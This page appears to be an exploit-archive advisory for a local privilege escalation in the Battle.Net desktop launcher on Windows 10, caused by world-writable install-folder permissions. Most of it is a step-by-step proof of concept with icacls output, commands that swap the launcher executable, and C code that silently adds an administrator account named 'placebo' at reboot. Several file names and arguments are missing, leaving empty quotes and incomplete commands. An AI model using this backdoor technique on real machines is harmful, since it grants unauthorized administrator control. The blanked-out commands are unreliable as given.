Battle.Net Insecure File Permissions

Battle.Net version suffers from a privilege escalation vulnerability due to insecure file permissions.

MD5 | 7ba6f91580f954f3c2273078165f9d19

# Exploit Title: Battle.Net - Insecure File Permissions
# Date: 2020-10-09
# Exploit Author: George Tsimpidas
# Software Link : ( Battle Net Desktop )
# Version Patch:
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
# Category: local

Vulnerability Description:

Battle.Net Launcher ( suffers from an elevation of
vulnerability which can be used by a simple user that can change the
executable file
with a binary of choice. The vulnerability exist due to the improper
with the 'F' flag (Full) for 'Users' group, making the entire directory
'' and its files and sub-dirs world-writable.

## Insecure Folder Permission

C:\Program Files (x86)>icacls BUILTIN\Users:(OI)(CI)(F)

## Insecure File Permission

C:\Program Files (x86)\>icacls "" BUILTIN\Users:(I)(F)

## Local Privilege Escalation Proof of Concept
#0. Download & install

#1. Create low privileged user & change to the user
## As admin

C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the Service EXE to a new name

C:\Program Files (x86)\> whoami


C:\Program Files (x86)\> move Battle.frey.exe
1 file(s) moved.

#3. Create malicious binary on kali linux

## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user placebo mypassword /add");
system("net localgroup Administrators placebo /add");
WinExec("C:\\Program Files (x86)\\\\Battle.frey.exe>",0);
return 0;

## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o

#4. Transfer created '' to the Windows Host

#5. Move the created '' binary to the 'C:\Program Files
(x86)\>' Folder

C:\Program Files (x86)\> move
C:\Users\lowpriv\Downloads\ .

#6. Check that exploit admin user doesn't exists

C:\Program Files (x86)\> net user placebo

The user name could not be found

#6. Reboot the Computer

C:\Program Files (x86)\> shutdown /r

#7. Login & look at that new Admin

C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None

Related Posts